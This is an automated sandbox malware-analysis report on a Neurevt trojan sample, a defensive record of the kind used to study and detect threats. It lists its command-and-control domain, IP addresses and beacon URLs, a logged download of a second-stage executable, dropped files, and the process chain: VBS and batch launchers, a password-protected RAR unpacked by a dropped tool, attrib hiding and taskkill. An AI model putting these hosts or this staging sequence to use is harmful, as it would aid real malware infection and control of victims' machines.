SHA256:
86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595
Date Analysed:
2021-06-25T01:26:51+05:30
File type:
EXE
Verdict:
Malware
Strain:
Trojan:Win32/Neurevt
Environment:
Windows 7 64-bit Operating System
IOC
Domain
russk18.icu
URL
http://russk18.icu/forum8/logout.php
http://russk18.icu/forum8/logout.php?page=XXX
Network
HTTP Conversations
[POST]http://russk18.icu/forum8/logout.php
Request Header
POST /forum8/logout.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 674
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 20
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
[POST]http://russk18.icu/forum8/logout.php?id=7084448
Request Header
POST /forum8/logout.php?id=7084448 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 4820
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 19
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
[POST]http://russk18.icu/forum8/logout.php?page=116
Request Header
POST /forum8/logout.php?page=116 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 1049
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 20
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
[GET]http://be-xoo.com/getdata2.exe
Request Header
GET /getdata2.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: be-xoo.com
Cache-Control: no-cache
Response body filetype
application/octet-stream
Response Header
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 24 Jun 2021 15
Accept-Ranges: bytes
ETag: "f98a8620b69d71
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Thu, 24 Jun 2021 19
Content-Length: 3146752
[POST]http://russk18.icu/forum8/logout.php?id=3192189
Request Header
POST /forum8/logout.php?id=3192189 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 657
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 20
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
DNS Resolutions
be-xoo.com
["144.202.1.97"]
windowsupdate.microsoft.com
["52.137.90.34"]
russk18.icu
["23.95.225.105"]
Files Dropped
c6a95ca7d803180979387ed82791c0d0afb148e1670c6c52a3fc29d6751cdac6
text/html; charset=UTF-8
8eca4cb567bc25fc6c08c81f50c00815d5501ca88361437d9873b9c4a6185bae
text/html; charset=UTF-8
361a9b2bc7a1badb20b9e53da78455e67ed0194caca7bcb1af5ac6c9822bbf9e
text/html; charset=UTF-8
07da4b8814b385a9228e474797c37d50cee0a73c0aa07f74a09fa3b21b581669
application/octet-stream
0bf7c94f526528b97dc3acbae9fd0097b7167a8760717cc549214ae4b7adf3aa
text/html; charset=UTF-8
66c2cb1ff42b7f0a0ca968d78be292faf24166c84bc8c6f8967782d528715d9a
text/html; charset=UTF-8
Process
Files Accessed
C:\LMPupdate\set\unpakedree.exe
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\aidatafile.zip
C:\LMPupdate\set\183.bat
C:\LMPupdate\set\x0329847998
C:\Windows\SysWOW64\profapi.dll
C:\LMPupdate\set\435246.vbs
C:\Windows
C:\Windows\SysWOW64
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\apphelp.dll
C:\Windows\SysWOW64\wscript.exe
C:\LMPupdate\set
C:\LMPupdate
C:\Windows\SysWOW64\advapi32.dll
C:\Windows\SysWOW64\vbscript.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\SysWOW64\dwmapi.dll
C:\Windows\SysWOW64\sxs.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\uxtheme.dll
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\SysWOW64\scrobj.dll
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
C:\Windows\SysWOW64\wshext.dll
C:\Windows\SysWOW64\msisip.dll
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\propsys.dll
C:\Windows\SysWOW64\wshom.ocx
C:\Windows\SysWOW64\scrrun.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\urlmon.dll
C:\Users\Administrator\Desktop\desktop.ini
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Windows\SysWOW64\ntmarta.dll
C:\Windows\WindowsShell.Manifest
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\winbrand.dll
C:\
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_4261962
C:\Windows\SysWOW64\timeout.exe
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Users\Administrator\AppData\Roaming\npm
C:\Users\Administrator\AppData\Local\Programs\Python\Python37
C:\Users\Administrator\AppData\Local\Programs\Python\Python37\Scripts
C:\Program Files\nodejs
C:\Windows\SysWOW64\WindowsPowerShell\v1.0
C:\Windows\SysWOW64\wbem
C:\Windows\SysWOW64\PING.EXE
C:\Windows\SysWOW64\rasadhlp.dll
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\wship6.dll
C:\Windows\SysWOW64\WSHTCPIP.DLL
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\SysWOW64\en-US\ping.exe.mui
C:\Windows\SysWOW64\winnsi.dll
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\AUninstall.ini
C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
C:\Windows\SysWOW64\crypt32.dll
C:\Users\Administrator\AppData
C:\Users\Administrator
C:\Users
C:\Users\desktop.ini
C:\LMPupdate\set\43939237cx.rar
C:\LMPupdate\set\48551.bat
C:\LMPupdate\set\xc829374091FD.exe
C:\LMPupdate\set\3980392CV.vbs
C:\Windows\System32\imm32.dll
C:\Windows\System32\winbrand.dll
C:\Windows\System32\apphelp.dll
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
C:\Windows\SysWOW64\sfc_os.dll
C:\Windows\SysWOW64\sfc.dll
C:\Windows\SysWOW64\attrib.exe
C:\Windows\SysWOW64\ulib.dll
C:\Windows\SysWOW64\en-US\attrib.exe.mui
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\taskkill.exe
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\secur32.dll
C:\Windows\SysWOW64\tapi3.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\en-US\taskkill.exe.mui
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\wtsapi32.dll
C:\Windows\SysWOW64\framedynos.dll
C:\Windows\SysWOW64\samcli.dll
C:\Windows\SysWOW64\ntdsapi.dll
C:\Windows\SysWOW64\wbem\fastprox.dll
C:\Windows\SysWOW64\wbem\wbemsvc.dll
C:\Windows\SysWOW64\RpcRtRemote.dll
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\explorer.exe
C:\Windows\winsxs
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\SysWOW64\wbemcomn.dll
C:\Windows\SysWOW64\wbem\wbemprox.dll
C:\Windows\SysWOW64\en-US\KernelBase.dll.mui
C:\Windows\SysWOW64\samlib.dll
C:\ProgramData
C:\ProgramData\Google Updater 2.09\3a1m9iqmu7mwag.exe
C:\ProgramData\Google Updater 2.09
C:\ProgramData\Google Updater 2.09\gayyokaek.txt
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\SysWOW64\slc.dll
C:\Windows\SysWOW64\powrprof.dll
C:\Windows\SysWOW64\dui70.dll
C:\Windows\SysWOW64\duser.dll
C:\Windows\SysWOW64\ExplorerFrame.dll
C:\Windows\Fonts\StaticCache.dat
C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\winrnr.dll
C:\Windows\SysWOW64\pnrpnsp.dll
C:\Windows\SysWOW64\NapiNSP.dll
C:\Windows\SysWOW64\nlaapi.dll
C:\Windows\SysWOW64\FWPUCLNT.DLL
C:\Windows\SysWOW64\IPHLPAPI.DLL
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\LocalLow\Sun\Java\Deployment\deployment.properties
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0NQY21LG\logout[1].php
C:\Windows\SysWOW64\SensApi.dll
C:\Windows\SysWOW64\ras
C:\Windows\SysWOW64\rtutils.dll
C:\Windows\SysWOW64\rasman.dll
C:\Windows\SysWOW64\rasapi32.dll
C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1118702447-2625566189-3437391212-500\a18ca4003deb042bbee7a40f15e1970b_d29292bc-6ac1-4095-a280-5613a9b5e8f4
C:\Windows\SysWOW64\userenv.dll
C:\Windows\SysWOW64\tzres.dll
C:\Users\ADMINI~1\AppData
C:\Users\ADMINI~1
C:\Users\ADMINI~1\AppData\Local\Temp
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe:14EDFC78
C:\Users\ADMINI~1\AppData\Local
C:\Windows\SysWOW64\npmproxy.dll
C:\Windows\SysWOW64\netprofm.dll
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe
C:\Windows\Microsoft.NET\Framework64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\System32\sechost.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
C:\Windows\System32\msvcr110_clr0400.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#
C:\Windows\System32\uxtheme.dll
C:\Windows\System32\cryptbase.dll
C:\Windows\System32\rpcss.dll
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\comctl32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\sortdefault.nlp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\nlssorting.dll
C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\GdiPlus.dll
C:\Windows\System32\tzres.dll
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\System32\WindowsCodecs.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arial.ttf
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
C:\Windows\System32\en-US\msctf.dll.mui
C:\Windows\System32\dwmapi.dll
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBB46FVT\logout[1].php
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZQNBZ6B0\logout[1].php
C:\Windows\SysWOW64\ole32.dll
C:\Windows\SysWOW64\en-US\msctf.dll.mui
C:\Windows\System32\powrprof.dll
C:\Windows\System32\KBDUS.DLL
C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc
C:\Windows\System32\msidle.dll
C:\Windows\System32\credssp.dll
C:\Windows\System32\sspicli.dll
C:\Windows\System32\secur32.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\esent.dll
C:\Windows\System32\mssrch.dll
C:\Windows\System32\tquery.dll
C:\Windows\System32\en-US\tquery.dll.mui
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.3.gthr
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.3.Crwl
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex
C:\Windows\System32\propsys.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap
C:\Windows\System32\mssprxy.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs
C:\ProgramData\Microsoft\Search\Data\Applications\Windows
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chk
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010005.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010005.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\SETTINGS.DIA
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002
C:\Windows\System32\samcli.dll
C:\Windows\System32\vsstrace.dll
C:\Windows\System32\atl.dll
C:\Windows\System32\vssapi.dll
C:\Windows\System32\ntmarta.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0002.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0002.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010009.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010009.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.wid
C:\Windows\System32\es.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32
C:\Windows\System32\LogFiles
C:\Windows\System32\LogFiles\WMI
C:\ProgramData\Microsoft\Search\Data
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Search
C:\ProgramData\Microsoft\Search\Data\Applications
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\ProgramData\VMware
C:\Program Files
C:\Windows\System32\wdi
C:\Windows\System32\Msdtc
C:\Windows\ServiceProfiles
C:\ProgramData\VMware\Compatibility
C:\Windows\ServiceProfiles\LocalService
C:\Windows\ServiceProfiles\LocalService\AppData
C:\Windows\ServiceProfiles\LocalService\AppData\Local
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
C:\Users\Administrator\AppData\Local\Microsoft\Windows
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History
C:\Users\Administrator\AppData\Roaming
C:\Users\Administrator\AppData\Roaming\Microsoft
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows
C:\Users\Administrator\AppData\Local
C:\Users\Administrator\AppData\Local\Microsoft
C:\Windows\AppCompat
C:\Windows\System32\wbem
C:\Windows\System32\catroot2
C:\Windows\ServiceProfiles\NetworkService
C:\Windows\ServiceProfiles\NetworkService\AppData
C:\Windows\ServiceProfiles\NetworkService\AppData\Local
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS
C:\ProgramData\Microsoft\Windows
C:\Windows\System32\userenv.dll
C:\Windows\System32\winsta.dll
C:\Windows\System32\wtsapi32.dll
C:\Windows\System32\stdole2.tlb
C:\Windows\System32\mssitlb.dll
C:\Windows\System32\sxs.dll
C:\Windows\System32\SearchFilterHost.exe
C:\Windows\System32\SearchProtocolHost.exe
C:\Windows\System32\mapi32.dll
C:\Windows\System32\mssvp.dll
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Windows\System32\shell32.dll
C:\Windows\System32\NlsLexicons0009.dll
C:\Windows\System32\NlsData0009.dll
C:\Windows\System32\NaturalLanguage6.dll
C:\Windows\System32\cscobj.dll
C:\Windows\System32\cscapi.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.ci
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.wid
C:\Users\Public\Desktop\desktop.ini
C:\Users\Public
C:\Users\Public\Documents\desktop.ini
C:\Users\Public\desktop.ini
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.wsb
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.dir
C:\Users\Administrator\AppData\LocalLow
C:\Users\Administrator\AppData\LocalLow\Sun
C:\Users\Administrator\AppData\LocalLow\Sun\Java
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Users\Administrator\AppData\Local\Microsoft\Windows\WER
C:\ProgramData\Microsoft\RAC
C:\Malware
C:\Windows\SysWOW64\winspool.drv
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\aisetup.ini
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\Englishai.lng
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\aisetup.zip
C:\Malware\86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595.exe
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515
C:\Windows\Fonts\tahomabd.ttf
C:\Windows\win.ini
C:\Windows\SysWOW64\riched20.dll
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu
Process Created
"C:/Malware/86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595.exe"
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
ping dhgfg sgudy
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe /suac
C:\Windows\SysWOW64\explorer.exe
"C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe"
"C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528
attrib +s +h "C:\LMPupdate\set"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
timeout 5
timeout 0
C:\LMPupdate\set\unpakedree.exe
cmd /c ""C:\LMPupdate\set\183.bat" "
timeout 6
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
timeout 2
xc829374091FD.exe /start
taskkill /f /im unpakedree.exe
attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
cmd /c ""C:\LMPupdate\set\48551.bat" "
timeout 4
Process Tree
2792
Image Path
"C:/Malware/86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595.exe"
Files Accessed
C:\LMPupdate\set
C:\LMPupdate
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\AUninstall.ini
Process Children
3172
Image Path
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
Files Accessed
C:\Windows\SysWOW64\cmd.exe
Process Children
3208
Image Path
cmd /c ""C:\LMPupdate\set\183.bat" "
Files Accessed
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
C:\Windows\SysWOW64\sfc_os.dll
C:\Windows\SysWOW64\sfc.dll
C:\LMPupdate\set\43939237cx.rar
Process Children
3236
Image Path
timeout 0
Files Accessed
C:\LMPupdate\set
C:\Windows
Process Children
3268
Image Path
C:\LMPupdate\set\unpakedree.exe
Files Accessed
C:\Users\Administrator
C:\Users
C:\Users\desktop.ini
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db
